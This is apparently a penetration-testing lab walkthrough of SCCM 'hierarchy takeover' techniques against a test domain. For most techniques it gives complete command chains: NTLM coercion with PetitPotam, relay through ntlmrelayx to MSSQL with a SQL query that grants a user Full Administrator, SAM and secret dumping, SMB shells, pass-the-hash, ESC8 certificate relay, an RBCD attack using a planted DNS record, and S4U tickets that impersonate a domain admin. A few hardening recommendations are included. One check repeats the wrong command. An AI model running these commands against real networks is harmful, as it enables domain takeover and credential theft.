SCCM - Takeover

TAKEOVER-1 - Hierarchy takeover via NTLM coercion and relay to MSSQL on remote site database

This attack requires the site database be hosted separately from the site server, because we are coercing the site server's computer account against the database server (it would not be possible to coerce against itself).

With the following command we can create a oneliner query that gives our normal domain user (mike), SCCM full administrator permissions (-sc is the site code):

sccmhunter.py mssql -u mike -p password! -d ludus.domain -dc-ip 10.2.10.10 -debug -tu mike -sc 123 -stacked

SCCMHunter MSSQL Output

The target IP is the database server (hosted separately from the site server):

impacket-ntlmrelayx -smb2support -ts -t mssql://10.2.10.13 -q "<full query from sccmhunter>"

So for example:

impacket-ntlmrelayx -smb2support -ts -t mssql://10.2.10.13 -q "DECLARE @AdminID INT; USE CM_123; INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT 0x010500000000000515000000EB54F0667AE95CAA872ED88965040000, 'ludus\mike', 0, 0, '', '', '', '', '123' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = 'ludus\mike' ); SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'ludus\mike'); INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = @AdminID  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );"

Next we coerce the target with petitpotam (or Coercer etc). First IP is that of your ntlmrelayx host, second IP should be the site server:

python3 PetitPotam.py -d ludus.domain -u mike -p password! 10.2.10.99 10.2.10.15

PetitPotam Output

Next, we can confirm with sccmhunter that we have SCCM Full Administrator permissions and thus are part of the local SMS admins group on the site server:

sccmhunter.py admin -u mike -p password! -ip 10.2.10.15
show_admins
show_rbac

SCCMHunter Admin Output

What can we do with Full Administrator permissions?

The "Full Administrator" security role is granted all permissions in Configuration Manager for all scopes and all collections. An attacker with this privilege can execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on. They can also leverage tools such as CMPivot and Run Script to query or execute scripts on client devices in real-time using the AdminService or WMI on an SMS Provider. See EXEC-1,2 etc.

Full Administrator Permissions

Recommendation:

Use Extended Protection for Authentication (EPA) on ADCS and site databases.

TAKEOVER-2 - Hierarchy takeover via NTLM coercion and relay to SMB on remote site database

TAKEOVER-2 documentation

Similar to Takeover-1 but now we target SMB instead of MSSQL.

Start ntlmrelay to dump the SAM of the database server or use -socks option:

impacket-ntlmrelayx -t 10.2.10.13 -smb2support

Coerce the site server computer account against site database (<ntlmrelayx IP> <site server IP>):

python3 PetitPotam.py -d ludus.domain -u mike -p password! 10.2.10.99 10.2.10.15

PetitPotam SMB Output

With -socks option:

NTLM Relay Socks Output

Then dump SAM or get a shell:

proxychains -q impacket-secretsdump 'LUDUS/SCCM-SITESRV$@10.2.10.13' -no-pass
proxychains -q impacket-smbexec LUDUS/'SCCM-SITESRV$'@10.2.10.13 -no-pass

netexec smb 10.2.10.13 -u administrator -H 8846f7eaee8fb117ad06bdd830b7586c --local-auth

NetExec SMB Output

At this point, if the service is running in the context of LocalSystem, you can access the database to grant your domain account the Full Administrator role (see TAKEOVER-1 SQL query). If the database is running in the context of a domain service account, further steps are needed:

In your shell check who is running sqlservr.exe:

tasklist /v /fi "IMAGENAME eq sqlservr.exe"

Tasklist Output

Get the SQL service domain account password:

secretsdump.py administrator@10.2.10.13 -hashes :8846f7eaee8fb117ad06bdd830b7586c

Secretsdump SQL Output

Sync time if needed (Clock skew too great error):

sudo ntpdate 10.2.10.10
 
or:
 
sudo timedatectl set-ntp off
sudo rdate -n 10.2.10.10

Get TGT for sqlsccmsvc:

impacket-getTGT "ludus.domain/sqlsccmsvc:Password123"

GetTGT Output

Get SPNs:

impacket-GetUserSPNs ludus.domain/domainuser:password -dc-ip 10.2.10.10 -request

Then S4U:

python3 /opt/PKINITtools/gets4uticket.py kerberos+ccache://ludus.domain\\sqlsccmsvc:sqlsccmsvc.ccache@DC01.ludus.domain MSSQLSvc/sccm-sql.ludus.domain:1433@ludus.domain SCCM-SITESRV\$@ludus.domain sqlsccmsvc_s4u.ccache -v

Once the ticket is obtained, it needs to be referenced with the following variable:

KRB5CCNAME=sccm_s4u.ccache

Get access to the site database (MSSQL):

impacket-mssqlclient ludus.domain/SCCM-SITESRV\$@ludus.domain -k -no-pass -windows-auth

Then give your low priv user Full administrator permissions (see the SQL query from Takeover-1).

TAKEOVER-3 - Hierarchy takeover via NTLM coercion and relay to HTTP on AD CS

TAKEOVER-3 documentation

When available, SCCM uses public key infrastructure (PKI) for authentication and authorization. While not required, administrators may choose to deploy Active Directory Certificate Services (AD CS) to support SCCM's various certificate requirements rather than use self-signed certificates. AD CS is home to its own misconfigurations; particularly ESC8. In short, the certificate enrollment web interface is vulnerable to NTLM relaying. An attacker may coerce NTLM authentication from a coercion target and relay to the AD CS enrollment web service to enroll in and acquire a valid certificate template on behalf of the target. The template can then be used to escalate to "Full Administrator" in SCCM by impersonating the coerced target.

Check if ADCS is vulnerable to ESC8:

certipy find -u domainuser -p password -dc-ip 10.2.10.10 -vulnerable -stdout

Vulnerable to ESC8

And NTLM authentication is enabled (check on all CA's):

curl -I http://10.2.10.10/certsrv/certfnsh.asp

NTLM enabled

Start ntlmrelayx and target the URL of the certificate enrollment web interface:

ntlmrelayx.py -t  http://10.2.10.10/certsrv/certfnsh.asp --adcs -smb2support

Next use Petitpotam (or Coercer) to coerce the site server. The SMB connection is relayed to the ADCS enrollment service to request a certifcate for the coerced target:

python3 PetitPotam.py -u domainuser -p password 10.2.10.99 10.2.10.15

Relay auth

Use the pfx to get the NTLM hash for the site server computer account:

Get NTLM hash

Authenticate to an SMS Provider as the site server and grant a user the Full Administrator role:

sccmhunter.py admin -u sccm-sitesrv$ -p aad3b435b51404eeaad3b435b51404ee:9e1762e7e18826fa764ec54e1858fb0d -ip 10.2.10.15
 
get_user lowpriv
add_admin lowpriv <SID>
show_admins

Add admin

TAKEOVER-4 - Hierarchy takeover via NTLM coercion and relay from CAS to origin primary site server

TAKEOVER-4 documentation

This requires a CAS (Central Administration Site) which can only be found in a multi-site hierarchy (not in the SCCM lab). See documentation for the details.

TAKEOVER-5 - Hierarchy Takeover via NTLM coercion and relay to AdminService on remote SMS Provider

TAKEOVER-5 documentation

Requires a remote SMS provider because you cannot relay the site server to itself (not in the SCCM lab). See documentation for the details.

TAKEOVER-6 - Hierarchy takeover via NTLM coercion and relay to SMB on remote SMS Provider

TAKEOVER-6 documentation

Requires a remote SMS provider because you cannot relay the site server to itself (not in the SCCM lab). See documentation for the details.

TAKEOVER-7 - Hierarchy Takeover via NTLM coercion and relay to SMB between primary and passive site servers

TAKEOVER-7 documentation

Requires an active and passive site server (not in the SCCM lab). See documentation for the details.

TAKEOVER-8 - Hierarchy takeover via NTLM coercion and relay HTTP to LDAP on domain controller

TAKEOVER-8 documentation

This is a good alternative if SMB signing is enabled on the site server.

Check if LDAP signing and/or binding are used:

netexec ldap 10.2.10.10 -u domainuser -p password -M ldap-checker

Check LDAP signing and binding

Check if you can create computer accounts. MachineAccountQuota should be more than 0 (default is 10):

netexec smb 10.2.10.15 -u domainuser -p password -M webdav

Check computer account quota

Check if webdav is enabled on the site server:

netexec smb 10.2.10.15 -u domainuser -p password -M webdav

Check webdav

On the attacker machine we first start ntlmrelayx and target LDAP on any DC (there is also support for ldaps://, however if the domain requires ldaps, ntlmrelayx will auto switch this for you). This command will automatically add computer account to perform the RBCD attack. It is also possible to do that step manually by first adding a computer account with the impacket-addcomputer tool and adding --escalate-user <COMPUTER$> to the ntlmrelayx command:

impacket-ntlmrelayx --no-smb-server --no-wcf-server --no-raw-server -ts -ip 10.2.10.99 -t ldap://10.2.10.10 --http-port 8080 --no-da --delegate-access

Next, we add a DNS record hackdef to the domain which points to our attacker machine (10.2.10.99). Authenticated users can add DNS records by default:

python3 dnstool.py -u 'ludus.domain\mike' -a add -r hackdef -d 10.2.10.99 10.2.10.10

Add DNS record This hostname is needed for the web client authentication (webdav). Specifying an IP in the following PetitPotam command won't work

We coerce the site server (10.2.10.15) with a tool such as Petitpotam/printerbug or Coercer:

python3 PetitPotam.py -d ludus.domain -u mike -p password123 hackdef@8080/a 10.2.10.15

PetitPotam

ntlmrelay output

LYQVFVGE$ can now impersonate users on SCCM-SITESRV$ via S4U2Proxy. Take note of the created computer account and its password.

Request a silver ticket for the domainadmin user which is only valid for SCCM-SITESRV.ludus.domain. It is possible to specify other SPNs than CIFS (needed for Psexec) such as HOST and HTTP for WinRM. Make sure that the domain admin you target is enabled and not part of the protected users group! The password is the one for the computer account:

impacket-getST ludus.domain/LYQVFVGE@SCCM-SITESRV.ludus.domain -spn 'cifs/SCCM-SITESRV.ludus.domain' -impersonate domainadmin -dc-ip 10.2.10.10

GetST

If you get a clock skew error:

sudo timedatectl set-ntp off
sudo ntpdate 10.2.10.10

Export the ticket:

export KRB5CCNAME=domainadmin@cifs_SCCM-SITESRV.ludus.domain@LUDUS.DOMAIN.ccache

Use the ticket with tools such as netexec to retrieve the site server computer account NTLM hash (SCCM-SITESRV$):

 netexec smb 10.2.10.15 -u domainadmin --use-kcache --lsa

netexec site server ntlm hash

This NTLM hash can be used to dump all credentials from the site database, see the CRED-5 section.

Recommendation:

Require LDAP signing and binding.
Disable the webclient on site servers.
Make sure that normal users can not add computer accounts by setting MachineAccountQuota to 0.
Do not allow authenticated users to add DNS records.

TAKEOVER-9 - Crawl site database links configured with DBA privileges

TAKEOVER-9 documentation

There are no other MSSQL servers in the SCCM lab and the documentation is missing for this one. However, I'm assuming that Takeover 9 is meant to describe how you can abuse MSSQL links configured with DBA privileges. If such a link is configured with the site database, it would allow for command execution on the site database MSSQL server.